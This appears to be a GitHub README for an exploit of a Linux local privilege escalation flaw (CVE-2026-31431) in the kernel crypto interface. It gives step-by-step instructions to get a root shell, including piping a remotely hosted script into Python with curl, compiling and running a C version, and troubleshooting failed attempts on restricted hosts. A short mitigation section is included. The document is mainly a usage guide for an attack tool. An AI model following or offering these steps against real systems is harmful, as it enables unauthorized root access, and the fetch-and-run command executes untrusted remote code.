Copy Fail (CVE-2026-31431)

April 29, 2026 ยท View on GitHub

โš ๏ธ Disclaimer

This content is for educational and authorized security testing purposes only. Do NOT run this on systems without explicit permission.

๐Ÿ“Œ Overview

Copy Fail (CVE-2026-31431) is a Linux Local Privilege Escalation (LPE) vulnerability affecting the kernel crypto API via AF_ALG.

It allows an unprivileged user to overwrite page cache data of a SUID binary (e.g., /usr/bin/su) and gain root access.

๐Ÿง  Requirements

System Requirements

  • Linux kernel (vulnerable โ€“ depends on patch status)
  • AF_ALG enabled
  • algif_aead module loaded

Python Exploit Requirements

  • Python 3.10+
  • Support for:
    • os.splice
    • socket(AF_ALG)

๐Ÿ” Checking Vulnerability

uname -a
grep -i authencesn /proc/crypto
lsmod | grep alg

Expected indicators:

  • authencesn(hmac(sha256),cbc(aes))
  • algif_aead loaded

๐Ÿ Running the Python Exploit

1. Execute directly

python3 copy_fail_exp.py

2. Or via curl (if remote hosted)

curl https://copy.fail/exp | python3

3. Trigger root shell

su
id

Expected result:

uid=0(root)

โš ๏ธ Common Issues (Python)

โŒ Error: os.splice not found

Cause:

  • Python version < 3.10
  • Restricted build

Solution:

  • Use a newer Python binary
  • Upload a static Python interpreter

โš™๏ธ Compiling the C Version

1. Compile

gcc copy_fail_exp.c -o copy_fail

2. Make executable

chmod +x copy_fail

3. Run exploit

./copy_fail
su

โš ๏ธ Common Issues (C)

โŒ Exploit runs but no root

Possible causes:

  • Kernel patched
  • Incorrect offsets
  • Environment mismatch

โŒ Compilation errors

Install required tools:

apt update && apt install build-essential

๐Ÿงช Troubleshooting

Check if system is patched

dmesg | grep -i alg

Verify module

lsmod | grep algif_aead

๐Ÿ›ก๏ธ Mitigation

Disable vulnerable module

echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead

Apply kernel patch

Update your system:

apt update && apt upgrade

๐Ÿ“Œ Notes

  • Exploit modifies page cache only (non-persistent)
  • Requires local access
  • Not remotely exploitable by default

๐Ÿง  Final Insight

If the exploit fails, consider:

  • Kernel already patched
  • Environment restrictions
  • Alternate privilege escalation vectors (SUID, capabilities, sudo misconfig)

๐Ÿ“š References

๐Ÿ‘จโ€๐Ÿ’ป Author Notes

Use this exploit responsibly in labs, CTFs, and authorized pentests only.